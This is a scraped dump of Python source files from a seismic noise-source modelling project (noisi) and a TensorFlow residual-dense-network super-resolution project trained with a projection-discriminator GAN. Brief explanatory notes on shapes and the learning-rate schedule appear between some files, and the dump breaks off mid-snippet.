"text": "import os\nimport numpy as np\n\ndef test_kernel():\n # copy the correlation\n if os.path.exists('test/testdata/testsrc/step_0/adjt'):\n os.system('rm -rf test/testdata/testsrc/step_0/adjt/')\n os.mkdir('test/testdata/testsrc/step_0/adjt')\n os.mkdir('test/testdata/testsrc/step_0/kern')\n os.system('cp test/testdata/testsrc/step_0/adjt_archived/*.sac \\\n test/testdata/testsrc/step_0/adjt/')\n os.system('cp -r test/testdata/testsrc/wavefield_processed_archived\\\n test/testdata/testsrc/wavefield_processed')\n\n os.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5\\\n test/testdata/testsrc/step_0/base_model.h5')\n\n # run forward model\n os.system('noisi kernel test/testdata/testsrc/ 0')\n\n # assert the results are the same\n # ToDo: path\n k1 = np.load('test/testdata/testsrc/step_0/kern/NET.STA1..CHA--NET.STA2..CHA.0.npy')\n k2 = np.load('test/testdata/testsrc/step_0/kern_archived/NET.STA1..CHA--NET.STA2..CHA.npy')\n assert ((k1-k2)/k1).max() < 1.e-06\n\n # remove stuff\n os.system('rm -rf test/testdata/testsrc/step_0/adjt/')\n os.system('rm -rf test/testdata/testsrc/step_0/kern/')\n os.system('rm -rf test/testdata/testsrc/wavefield_processed')\n"
},
{
"alpha_fraction": 0.5996432304382324,
"alphanum_fraction": 0.6024464964866638,
"avg_line_length": 34.96330261230469,
"blob_id": "319d00b6067f89558e483963fe0af506f1cbff17",
"content_id": "407f434bb88621bb9e0914acc740bec0c68686bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3924,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 109,
"path": "/noisi/my_classes/noisesource.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport h5py\n\nfrom scipy.stats import linregress\nimport os\ntry:\n from noisi.util.plot import plot_grid\nexcept ImportError:\n print('Plotting unavailable, is basemap installed?')\n\nfrom noisi.util.geo import get_spherical_surface_elements\n\nclass NoiseSource(object):\n \"\"\"\n 'model' of the noise source that comes in terms of a couple of basis \n functions and associated weights. The NoiseSource object should contain a \n function to determine weights from a (kernel? source model?), and to expand from weights and basis \n functions.\n \n \"\"\"\n \n \n def __init__(self,model,w='r'):\n \n # Model is an hdf5 file which contains the basis and weights of the source model!\n \n \n try:\n self.model = h5py.File(model,w)\n self.src_loc = self.model['coordinates']\n self.freq = self.model['frequencies']\n \n # Presumably, these arrays are small and will be used very often --> good to have in memory.\n self.distr_basis = self.model['distr_basis'][:]\n self.spect_basis = self.model['spect_basis'][:]\n self.distr_weights = self.model['distr_weights'][:]\n\n # The surface area of each grid element...new since June 18\n try:\n self.surf_area = self.model['surf_areas'][:]\n except KeyError:\n # approximate as spherical surface elements...\n self.surf_area = get_spherical_surface_elements(\n self.src_loc[0],self.src_loc[1])\n np.save('surface_areas_grid.npy',self.surf_area)\n \n self.spatial_source_model = self.expand_distr()\n \n except IOError:\n msg = 'Unable to open model file '+model\n raise IOError(msg)\n\n\n \n def __enter__(self):\n return self\n \n def __exit__(self,type,value,traceback):\n \n if self.model is not None:\n self.model.close()\n #ToDo: Check what parameters/data should be written before file closed\n\n def project_gridded(self):\n pass\n\n def expand_distr(self):\n expand = np.dot(self.distr_weights,self.distr_basis)\n \n return np.array(expand,ndmin=2)\n\n\n def get_spect(self,iloc):\n # return one spectrum in location with index iloc\n # The reason this function is for one spectrum only is that the entire gridded matrix of spectra by location is most probably pretty big.\n \n\n weights = self.spatial_source_model[:,iloc]#np.array(self.expand_distr()[:,iloc])\n \n \n return np.dot(weights, self.spect_basis)\n \n \n def plot(self,**options):\n \n # plot the distribution\n \n for m in self.spatial_source_model: \n plot_grid(self.src_loc[0],self.src_loc[1],m,**options)\n\n\n \n # Note: Inefficient way of doing things! Whichever script needs the noise source field should rather look up things directly in the hdf5 file.\n # But: ToDo: This could be used internally to write to a file, rather than reading from.\n # Although: A problem to think about: noise source should behave the same, whether it is defined by model or by file. So maybe, since model will be the default option anyway, work with this!\n #def get_spectrum(self,iloc):\n # # Return the source spectrum at location nr. iloc\n # \n # #if self.file is not None:\n # # return self.sourcedistr[iloc] * self.spectra[iloc,:]\n # if self.model is not None:\n # return self.spectr.\n # # (Expand from basis fct. in model)\n #def get_sourcedistr(self,i):\n # # Return the spatial distribution of max. PSD\n # if self.file is not None:\n # return np.multiply(self.sourcedistr[:],self.spectra[:,i])\n # else:\n # raise NotImplementedError\n \n"
},
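The shapes involved in NoiseSource.expand_distr() and get_spect() above, as a toy example (all arrays are random placeholders):

import numpy as np

distr_weights = np.array([1., 0.5])     # one weight per spatial basis
distr_basis = np.random.rand(2, 10)     # 2 spatial bases x 10 grid points
spect_basis = np.random.rand(1, 33)     # 1 spectral basis x 33 frequencies

# expand_distr(): weighted sum of the spatial bases, kept 2-D
spatial_model = np.array(np.dot(distr_weights, distr_basis), ndmin=2)
# get_spect(iloc=3): the spatial weight(s) at one location times the spectra
spect_at_3 = np.dot(spatial_model[:, 3], spect_basis)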
{
"alpha_fraction": 0.7168331146240234,
"alphanum_fraction": 0.7410841584205627,
"avg_line_length": 37.94444274902344,
"blob_id": "463f78f83d3b4a0d1ef27ee66ba7a685707c0deb",
"content_id": "cea46442bff9d013085b40a9342c946facfae9d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1402,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 36,
"path": "/noisi/test/test_update.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nfrom noisi import NoiseSource\n\ndef test_update():\n\t# copy data\n\tos.mkdir('test/testdata/testsrc/step_0/corr')\n\tos.mkdir('test/testdata/testsrc/step_0/grad')\n\t\n\tos.system('cp test/testdata/testsrc/step_0/corr_archived/NET.STA1..CHA--NET.STA2..CHA.sac \\\n\t\ttest/testdata/testsrc/step_0/corr/NET.STA1..CHA--NET.STA2..CHA.sac')\n\n\tos.system('cp test/testdata/testsrc/step_0/grad_archived/grad_all.npy\\\n\t\ttest/testdata/testsrc/step_0/grad/grad_all.npy')\n\tos.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5\\\n\t\ttest/testdata/testsrc/step_0/starting_model.h5')\n\tos.system('cp test/testdata/testsrc/step_0/ln_energy_ratio.measurement_archived.csv\\\n\t\ttest/testdata/testsrc/step_0/ln_energy_ratio.0.measurement.csv')\n\t\n\n\t# run forward model\n\tos.system('./test/testdata/testsrc/update.sh')\n\n\t# assert the results are the same\n\t# ToDo: path\n\tn1 = NoiseSource('test/testdata/testsrc/step_1_archived/starting_model.h5')\n\tn2 = NoiseSource('test/testdata/testsrc/step_1/starting_model.h5')\n\n\tassert (n1.distr_basis == n2.distr_basis).sum() == len(n1.distr_basis[0,:])\n\t\n\t\n\t# remove stuff\n\tos.system('rm -rf test/testdata/testsrc/step_0/grad')\n\tos.system('rm -rf test/testdata/testsrc/step_0/corr')\n\tos.system('rm -rf test/testdata/testsrc/step_1')\n\tos.system('rm test/testdata/testsrc/step_0/starting_model.h5')\n\tos.system('rm test/testdata/testsrc/step_0/ln_energy_ratio.0.measurement.csv')\n"
},
{
"alpha_fraction": 0.7120000123977661,
"alphanum_fraction": 0.7120000123977661,
"avg_line_length": 23.799999237060547,
"blob_id": "58a55094fd33812ba83dfe90858703dd3f72012d",
"content_id": "a1651778d582cbc409c4bc4d6f3b6502a3871bb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 125,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 5,
"path": "/noisi/test/test_setup.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\n\ndef test_setup():\n os.system('noisi setup_project testtesttesttest')\n os.system('rm -rf testtesttesttest')\n\n"
},
{
"alpha_fraction": 0.6978764533996582,
"alphanum_fraction": 0.7080115675926208,
"avg_line_length": 43.085105895996094,
"blob_id": "cca842d8aa4853ebbeb55a77f955eba0e5f49af5",
"content_id": "a59c72ce138f805b900becc6a40742bf885329f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2072,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 47,
"path": "/noisi/util/voronoi_surface_area.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nfrom noisi.borrowed_functions.voronoi_polygons import getVoronoiCollection\nfrom noisi.borrowed_functions.voronoi_surface_area import calculate_surface_area_of_a_spherical_Voronoi_polygon\nfrom noisi.borrowed_functions.voronoi_polygons import xyzToSpherical\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef get_voronoi_surface_area(grd):\n \"\"\"\n Computes the spherical voronoi cells and calculates their surface areas.\n Input: grid with longitude and latitude \n Output: grid (since the order might change) and voronoi surface areas corresponding to each point\n \n Functions from:\n https://github.com/tylerjereddy/spherical-SA-docker-demo/blob/master/docker_build/demonstration.py\n https://github.com/MITHaystack/scikit-discovery/blob/master/skdiscovery/visualization/spherical_voronoi.py#L40\n \"\"\"\n # convert grid into panda dataframe\n gridpd = {'lat': grd[1], 'lon': grd[0]}\n grid_data = pd.DataFrame(data=gridpd)\n \n # Calculate the vertices for the voronoi cells\n voronoi = getVoronoiCollection(data=grid_data,lat_name='lat',lon_name='lon',full_sphere=True)\n \n # Calculate the surface area for each voronoi cell\n voronoi_lat = []\n voronoi_lon = []\n voronoi_area = []\n \n for i in range(0,np.size(voronoi.points,0)):\n P_cart = xyzToSpherical(x=voronoi.points[i,0],y=voronoi.points[i,1],z=voronoi.points[i,2])\n voronoi_lat.append(P_cart[0])\n voronoi_lon.append(P_cart[1])\n vert_points = voronoi.vertices[voronoi.regions[i]]\n area = calculate_surface_area_of_a_spherical_Voronoi_polygon(vert_points,6371)\n voronoi_area.append(area)\n if i%1000 == 0:\n print('%g of %g voronoi cell surface areas calculated.' %(i,np.size(voronoi.points,0)),flush=True)\n \n # Reassign grd so that everything is in the right order\n grd = np.asarray([voronoi_lon,voronoi_lat])\n voronoi_area = np.asarray(voronoi_area)\n print('All voronoi cell surface areas calculated.')\n \n return grd, voronoi_area\n"
}
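Note that recent scipy can compute the same quantities directly; a sketch (assuming scipy >= 1.5 for calculate_areas), using an octahedral toy grid:

import numpy as np
from scipy.spatial import SphericalVoronoi

lon = np.deg2rad([0., 90., 180., -90., 0., 0.])
lat = np.deg2rad([0., 0., 0., 0., 90., -90.])
r = 6371.
# points must lie on the sphere of the given radius
xyz = r * np.column_stack((np.cos(lat) * np.cos(lon),
                           np.cos(lat) * np.sin(lon),
                           np.sin(lat)))
sv = SphericalVoronoi(xyz, radius=r)
sv.sort_vertices_of_regions()
print(sv.calculate_areas())     # one surface area per input point, km^2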
] | 51 |
MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution
|
https://github.com/MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution
|
c5055134367c23e05986b2a15cfd091a2e10155b
|
425f2613e0520a2588703d5d40dc5a2df2f3f1c0
|
06d2bd1f8e10677caa4b3c4e986a5afd93455b03
|
refs/heads/master
| 2021-07-17T20:25:41.864345 | 2020-06-05T07:53:33 | 2020-06-05T07:53:33 | 162,711,378 | 26 | 3 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5573596358299255,
"alphanum_fraction": 0.5761760473251343,
"avg_line_length": 39.92356872558594,
"blob_id": "3d9f37d1f2ee5581c567fa5584f9d43fae075f17",
"content_id": "0653ca2e9737e33f857f7ddc075e6c641e076b5c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6590,
"license_type": "permissive",
"max_line_length": 133,
"num_lines": 157,
"path": "/ops.py",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\r\n\r\n\r\n\r\ndef batchnorm(x, train_phase, scope_bn):\r\n #Batch Normalization\r\n #Ioffe S, Szegedy C. Batch normalization: accelerating deep network training by reducing internal covariate shift[J]. 2015:448-456.\r\n with tf.variable_scope(scope_bn):\r\n beta = tf.get_variable(name=scope_bn + 'beta', shape=[x.shape[-1]],\r\n initializer=tf.constant_initializer([0.]), trainable=True) # label_nums x C\r\n gamma = tf.get_variable(name=scope_bn + 'gamma', shape=[x.shape[-1]],\r\n initializer=tf.constant_initializer([1.]), trainable=True) # label_nums x C\r\n batch_mean, batch_var = tf.nn.moments(x, [0, 1, 2], name='moments')\r\n ema = tf.train.ExponentialMovingAverage(decay=0.5)\r\n\r\n def mean_var_with_update():\r\n ema_apply_op = ema.apply([batch_mean, batch_var])\r\n with tf.control_dependencies([ema_apply_op]):\r\n return tf.identity(batch_mean), tf.identity(batch_var)\r\n\r\n mean, var = tf.cond(train_phase, mean_var_with_update,\r\n lambda: (ema.average(batch_mean), ema.average(batch_var)))\r\n normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)\r\n return normed\r\n\r\n\r\ndef _l2normalize(v, eps=1e-12):\r\n return v / tf.sqrt(tf.reduce_sum(tf.square(v)) + eps)\r\n\r\n\r\ndef max_singular_value(W, u, Ip=1):\r\n _u = u\r\n _v = 0\r\n for _ in range(Ip):\r\n _v = _l2normalize(tf.matmul(_u, W), eps=1e-12)\r\n _u = _l2normalize(tf.matmul(_v, W, transpose_b=True), eps=1e-12)\r\n _v = tf.stop_gradient(_v)\r\n _u = tf.stop_gradient(_u)\r\n sigma = tf.reduce_sum(tf.matmul(_u, W) * _v)\r\n return sigma, _u, _v\r\n\r\ndef spectral_normalization(name, W, Ip=1):\r\n u = tf.get_variable(name + \"_u\", [1, W.shape[-1]], initializer=tf.random_normal_initializer(), trainable=False) # 1 x ch\r\n W_mat = tf.transpose(tf.reshape(W, [-1, W.shape[-1]]))\r\n sigma, _u, _ = max_singular_value(W_mat, u, Ip)\r\n with tf.control_dependencies([tf.assign(u, _u)]):\r\n W_sn = W / sigma\r\n return W_sn\r\n\r\n\r\ndef conv(name, inputs, k_size, nums_out, strides, is_sn=False):\r\n nums_in = int(inputs.shape[-1])\r\n kernel = tf.get_variable(name+\"W\", [k_size, k_size, nums_in, nums_out], initializer=tf.truncated_normal_initializer(stddev=0.02))\r\n bias = tf.get_variable(name+\"B\", [nums_out], initializer=tf.constant_initializer(0.))\r\n if is_sn:\r\n return tf.nn.conv2d(inputs, spectral_normalization(name, kernel), [1, strides, strides, 1], \"SAME\") + bias\r\n else:\r\n return tf.nn.conv2d(inputs, kernel, [1, strides, strides, 1], \"SAME\") + bias\r\n\r\ndef relu(inputs):\r\n return tf.nn.relu(inputs)\r\n\r\ndef leaky_relu(inputs, slope=0.2):\r\n return tf.maximum(inputs, slope * inputs)\r\n\r\ndef RDB(name, inputs, C_nums, G, G_0):\r\n #Paper: Figure 3.\r\n with tf.variable_scope(\"RDB_\"+name):\r\n temp = tf.identity(inputs)\r\n for i in range(C_nums):\r\n x = conv(\"conv1_\" + str(i), inputs, 3, G, 1)\r\n x = relu(x)\r\n inputs = tf.concat([inputs, x], axis=-1)\r\n inputs = conv(\"conv\", inputs, 1, G_0, 1)\r\n inputs = temp + inputs\r\n return inputs\r\n\r\ndef Upscale(inputs, factor):\r\n B = tf.shape(inputs)[0]\r\n H = tf.shape(inputs)[1]\r\n W = tf.shape(inputs)[2]\r\n nums_in = int(inputs.shape[-1])\r\n nums_out = nums_in // factor ** 2\r\n inputs = tf.split(inputs, num_or_size_splits=nums_out, axis=-1)\r\n output = 0\r\n for idx, split in enumerate(inputs):\r\n temp = tf.reshape(split, [B, H, W, factor, factor])\r\n temp = tf.transpose(temp, perm=[0, 1, 4, 2, 3])\r\n temp = tf.reshape(temp, [B, H * factor, W * factor, 1])\r\n if idx == 0:\r\n output = 
temp\r\n        else:\r\n            output = tf.concat([output, temp], axis=-1)\r\n    return output\r\n\r\ndef Linear(name, inputs, nums_in, nums_out, is_sn=True):\r\n    W = tf.get_variable(\"W_\" + name, [nums_in, nums_out], initializer=tf.truncated_normal_initializer(stddev=0.02))\r\n    b = tf.get_variable(\"B_\" + name, [nums_out], initializer=tf.constant_initializer([0.]))\r\n    if is_sn:\r\n        return tf.matmul(inputs, spectral_normalization(name, W)) + b\r\n    else:\r\n        return tf.matmul(inputs, W) + b\r\n\r\ndef avg_pool(inputs, k_size=3, strides=2, padding=\"SAME\"):\r\n    return tf.nn.avg_pool(inputs, [1, k_size, k_size, 1], [1, strides, strides, 1], padding)\r\n\r\ndef ResBlock(name, inputs, k_size, nums_out, is_down=True):\r\n    #inputs: B x H x W x C_in\r\n    with tf.variable_scope(name):\r\n        temp = inputs\r\n        inputs = relu(inputs)\r\n        inputs = conv(\"conv1\", inputs, k_size, nums_out, 1, True) # inputs: B x H/2 x W/2 x C_out\r\n        inputs = relu(inputs)\r\n        inputs = conv(\"conv2\", inputs, k_size, nums_out, 1, True) # inputs: B x H/2 x W/2 x C_out\r\n        if is_down:\r\n            inputs = avg_pool(inputs)\r\n            down_sampling = conv(\"down_sampling_\" + name, temp, 1, nums_out, 1, True) # down_sampling: B x H x W x C_out\r\n            down_sampling = avg_pool(down_sampling)\r\n            outputs = inputs + down_sampling\r\n        else:\r\n            outputs = inputs + temp\r\n        return outputs\r\n\r\ndef ResBlock0(name, inputs, k_size, nums_out, is_down=True):\r\n    #inputs: B x H x W x C_in\r\n    with tf.variable_scope(name):\r\n        temp = inputs\r\n        inputs = conv(\"conv1\", inputs, k_size, nums_out, 1, True) # inputs: B x H/2 x W/2 x C_out\r\n        inputs = relu(inputs)\r\n        inputs = conv(\"conv2\", inputs, k_size, nums_out, 1, True) # inputs: B x H/2 x W/2 x C_out\r\n        inputs = relu(inputs)\r\n        if is_down:\r\n            inputs = avg_pool(inputs)\r\n            down_sampling = conv(\"down_sampling_\" + name, temp, 1, nums_out, 1, True) # down_sampling: B x H x W x C_out\r\n            down_sampling = avg_pool(down_sampling)\r\n            outputs = inputs + down_sampling\r\n        else:\r\n            outputs = inputs + temp\r\n        return outputs\r\n\r\ndef Inner_product(inputs, y):\r\n    # projection term of \"cGANs with projection discriminator\"\r\n    with tf.variable_scope(\"IP\"):\r\n        inputs = conv(\"conv\", inputs, 3, 3, 1, True)\r\n        inputs = tf.reduce_sum(inputs * y, axis=[1, 2, 3])\r\n    return inputs\r\n\r\ndef global_sum_pooling(inputs):\r\n    return tf.reduce_sum(inputs, axis=[1, 2])\r\n\r\ndef Hinge_Loss(fake_logits, real_logits):\r\n    D_loss = tf.reduce_mean(tf.maximum(0., 1 - real_logits)) + \\\r\n             tf.reduce_mean(tf.maximum(0., 1 + fake_logits))\r\n    G_loss = -tf.reduce_mean(fake_logits)\r\n    return D_loss, G_loss\r\n\r\ndef MSE(a, b):\r\n    # NOTE: despite its name, this is a mean absolute (L1) pixel loss;\r\n    # a true MSE would use tf.square(a - b) instead of tf.abs(a - b)\r\n    return tf.reduce_mean(tf.reduce_sum(tf.abs(a - b), axis=[1, 2, 3]))\r\n\r\n\r\n\r\n"
},
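The `max_singular_value`/`spectral_normalization` pair in `ops.py` above estimates the largest singular value of the reshaped kernel by power iteration, one step per training update, with the `u` vector persisted between updates. A minimal numpy sketch of that estimate, checked against an exact SVD; the function and variable names here are mine, not from the repo:

```python
import numpy as np

def _l2normalize(v, eps=1e-12):
    # same normalization as in ops.py, in plain numpy
    return v / np.sqrt((v ** 2).sum() + eps)

def power_iteration_sigma(W, n_iters=1, seed=0):
    # W plays the role of W_mat in ops.py: a 2-D view of the conv kernel
    rng = np.random.default_rng(seed)
    u = rng.standard_normal((1, W.shape[0]))
    for _ in range(n_iters):
        v = _l2normalize(u @ W)      # right singular vector estimate
        u = _l2normalize(v @ W.T)    # left singular vector estimate
    return float((u @ W * v).sum())  # sigma = u W v^T

W = np.random.default_rng(1).standard_normal((64, 3 * 3 * 32))
print(power_iteration_sigma(W, n_iters=50))   # approaches the exact value
print(np.linalg.svd(W, compute_uv=False)[0])  # exact largest singular value
```

With `Ip=1` as in the repo, a single step per update is a rough estimate at first, but because `u` is reused across updates the estimate tracks the true singular value as training proceeds.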
{
"alpha_fraction": 0.47505518794059753,
"alphanum_fraction": 0.5236203074455261,
"avg_line_length": 39.94444274902344,
"blob_id": "d36c8fde8e28306440d1daf8126e6234a680bea2",
"content_id": "74506f5e05cc8d4dd7df41705953fe2565ba2f66",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2265,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 54,
"path": "/networks.py",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "from ops import *\r\n\r\nclass Generator:\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n def __call__(self, inputs, G_0=64, G=32, D=20, C_nums=6):\r\n #Section 5.3 for configuration\r\n #Grouth rate: G_0, G, The number of RDB: D\r\n with tf.variable_scope(self.name):\r\n inputs = relu(conv(\"conv1\", inputs, 3, G_0, 1))\r\n F_1 = tf.identity(inputs)\r\n inputs = relu(conv(\"conv2\", inputs, 3, G_0, 1))\r\n\r\n inputs = RDB(\"0\", inputs, C_nums=C_nums, G=G, G_0=G_0)\r\n temp = tf.identity(inputs)\r\n for i in range(1, D):\r\n inputs = RDB(str(i), inputs, C_nums=C_nums, G=G, G_0=G_0)\r\n temp = tf.concat([inputs, temp], axis=-1)\r\n inputs = relu(conv(\"conv3\", temp, 1, G_0, 1))\r\n F_GF = relu(conv(\"conv4\", inputs, 3, G_0, 1))\r\n F_DF = F_GF + F_1\r\n inputs = Upscale(F_DF, 2)\r\n inputs = relu(conv(\"Up_conv1\", inputs, 3, G, 1))\r\n inputs = Upscale(inputs, 2)\r\n inputs = conv(\"Up_conv2\", inputs, 3, 3, 1)\r\n return tf.nn.tanh(inputs)\r\n\r\n def var_list(self):\r\n return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)\r\n\r\nclass Discriminator:\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n def __call__(self, inputs, y):\r\n with tf.variable_scope(self.name, reuse=tf.AUTO_REUSE):\r\n inputs = ResBlock0(\"Res1\", inputs, 3, 64)\r\n inputs = ResBlock(\"Res2\", inputs, 3, 64, False)\r\n inputs = ResBlock(\"Res3\", inputs, 3, 128)\r\n inputs = ResBlock(\"Res4\", inputs, 3, 128, False)\r\n x = Inner_product(inputs, y)\r\n inputs = ResBlock(\"Res5\", inputs, 3, 128)\r\n inputs = ResBlock(\"Res6\", inputs, 3, 256)#256\r\n inputs = ResBlock(\"Res7\", inputs, 3, 512)#512\r\n inputs = ResBlock(\"Res8\", inputs, 3, 1024)#1024\r\n inputs = ResBlock(\"Res9\", inputs, 3, 1024, False)#1024\r\n inputs = relu(inputs)\r\n inputs = global_sum_pooling(inputs)\r\n inputs = Linear(\"Linear\", inputs, 1024, 1) + x\r\n return inputs\r\n\r\n def var_list(self):\r\n return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)\r\n"
},
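Since the generator in `networks.py` above upsamples twice by a factor of 2, it maps a 24x24 LR patch to a 96x96 SR patch, the shapes hard-coded in `Train.py`. A quick graph-construction check of that, assuming TF 1.x as the rest of the repo does (this snippet is mine, not repo code):

```python
import tensorflow as tf            # TF 1.x, as the repo assumes
from networks import Generator

LR = tf.placeholder(tf.float32, [None, 24, 24, 3])
SR = Generator("RDN")(LR)          # two Upscale(..., 2) stages -> x4 overall
print(SR.shape)                    # expected: (?, 96, 96, 3)
```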
{
"alpha_fraction": 0.5846905708312988,
"alphanum_fraction": 0.6131922006607056,
"avg_line_length": 41.08771896362305,
"blob_id": "1b29e59ff2f1a1bbd7c80c8a39460a8a93086e81",
"content_id": "4815ee4cde0acbfe169e7380e760d3e9fe6a02ad",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2456,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 57,
"path": "/Train.py",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "from networks import Generator, Discriminator\r\nfrom ops import Hinge_Loss, MSE\r\nimport tensorflow as tf\r\nfrom utils import read_crop_data\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\n#Paper: CGANS WITH PROJECTION DISCRIMINATOR\r\n#Paper: Residual Dense Network for Image Super-Resolution\r\n\r\nBATCH_SIZE = 16\r\nMAX_ITERATION = 600000\r\nTRAINING_SET_PATH = \"./TrainingSet/\"\r\nLAMBDA = 100\r\nSAVE_MODEL = \"./save_para/\"\r\nRESULTS = \"./results/\"\r\n\r\n\r\n\r\ndef train():\r\n RDN = Generator(\"RDN\")\r\n D = Discriminator(\"discriminator\")\r\n HR = tf.placeholder(tf.float32, [None, 96, 96, 3])\r\n LR = tf.placeholder(tf.float32, [None, 24, 24, 3])\r\n SR = RDN(LR)\r\n fake_logits = D(SR, LR)\r\n real_logits = D(HR, LR)\r\n D_loss, G_loss = Hinge_Loss(fake_logits, real_logits)\r\n G_loss += MSE(SR, HR) * LAMBDA\r\n itr = tf.Variable(MAX_ITERATION, dtype=tf.int32, trainable=False)\r\n learning_rate = tf.Variable(2e-4, trainable=False)\r\n op_sub = tf.assign_sub(itr, 1)\r\n D_opt = tf.train.AdamOptimizer(learning_rate, beta1=0., beta2=0.9).minimize(D_loss, var_list=D.var_list())\r\n with tf.control_dependencies([op_sub]):\r\n G_opt = tf.train.AdamOptimizer(learning_rate, beta1=0., beta2=0.9).minimize(G_loss, var_list=RDN.var_list())\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n lr0 = 2e-4\r\n saver = tf.train.Saver()\r\n while True:\r\n HR_data, LR_data = read_crop_data(TRAINING_SET_PATH, BATCH_SIZE, [96, 96, 3], 4)\r\n sess.run(D_opt, feed_dict={HR: HR_data, LR: LR_data})\r\n [_, iteration] = sess.run([G_opt, itr], feed_dict={HR: HR_data, LR: LR_data})\r\n iteration_ = iteration*1.0\r\n iteration = MAX_ITERATION - iteration\r\n if iteration > MAX_ITERATION // 2:\r\n learning_rate_ = lr0 * (iteration_ * 2 / MAX_ITERATION)\r\n sess.run(tf.assign(learning_rate, learning_rate_))\r\n if iteration % 10 == 0:\r\n [D_LOSS, G_LOSS, LEARNING_RATE, img] = sess.run([D_loss, G_loss, learning_rate, SR], feed_dict={HR: HR_data, LR: LR_data})\r\n output = (np.concatenate((HR_data[0, :, :, :], img[0, :, :, :]), axis=1) + 1) * 127.5\r\n Image.fromarray(np.uint8(output)).save(RESULTS+str(iteration)+\".jpg\")\r\n print(\"Iteration: %d, D_loss: %f, G_loss: %f, LearningRate: %f\"%(iteration, D_LOSS, G_LOSS, LEARNING_RATE))\r\n if iteration % 500 == 0:\r\n saver.save(sess, SAVE_MODEL + \"model.ckpt\")\r\n\r\ntrain()\r\n"
},
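The countdown variable `itr` in `Train.py` implements a piecewise learning-rate schedule: constant at 2e-4 for the first half of training, then a linear ramp down to zero over the second half. A small sketch (mine, not repo code) that evaluates the same formula:

```python
MAX_ITERATION = 600000
lr0 = 2e-4

def lr_at(iteration):
    # 'remaining' corresponds to iteration_ (the countdown value) in Train.py
    remaining = MAX_ITERATION - iteration
    if iteration > MAX_ITERATION // 2:
        return lr0 * (remaining * 2 / MAX_ITERATION)
    return lr0

for it in (0, 300000, 450000, 600000):
    print(it, lr_at(it))   # 2e-4, 2e-4, 1e-4, 0.0
```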
{
"alpha_fraction": 0.5222830176353455,
"alphanum_fraction": 0.541829526424408,
"avg_line_length": 35.55882263183594,
"blob_id": "5c15e8d044c66921885bedd61d4e189a5cbc8e29",
"content_id": "489cc421824d16ae4dbae6a944fb890fe44caa6e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1279,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 34,
"path": "/utils.py",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport scipy.misc as misc\r\nfrom PIL import Image\r\nimport os\r\n\r\n\r\n\r\ndef read_crop_data(path, batch_size, shape, factor):\r\n h = shape[0]\r\n w = shape[1]\r\n c = shape[2]\r\n filenames = os.listdir(path)\r\n rand_selects = np.random.randint(0, filenames.__len__(), [batch_size])\r\n batch = np.zeros([batch_size, h, w, c])\r\n downsampled = np.zeros([batch_size, h//factor, w//factor, c])\r\n for idx, select in enumerate(rand_selects):\r\n try:\r\n img = np.array(Image.open(path + filenames[select]))[:, :, :3]\r\n crop = random_crop(img, h)\r\n batch[idx, :, :, :] = crop\r\n downsampled[idx, :, :, :] = misc.imresize(crop, [h // factor, w // factor])\r\n except:\r\n img = np.array(Image.open(path + filenames[0]))[:, :, :3]\r\n crop = random_crop(img, h)\r\n batch[idx, :, :, :] = crop\r\n downsampled[idx, :, :, :] = misc.imresize(crop, [h//factor, w//factor])\r\n return batch/127.5 - 1.0, downsampled / 127.5 - 1.0\r\n\r\ndef random_crop(img, size):\r\n h = img.shape[0]\r\n w = img.shape[1]\r\n start_x = np.random.randint(0, h - size + 1)\r\n start_y = np.random.randint(0, w - size + 1)\r\n return img[start_x:start_x + size, start_y:start_y + size, :]\r\n\r\n"
},
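Because `scipy.misc.imresize` (used in `utils.py` above) was removed in SciPy 1.3, the same bilinear downsample can be done with PIL alone on newer installs. A drop-in sketch (my suggestion, not repo code; the helper name is mine):

```python
import numpy as np
from PIL import Image

def imresize_like(arr, size):
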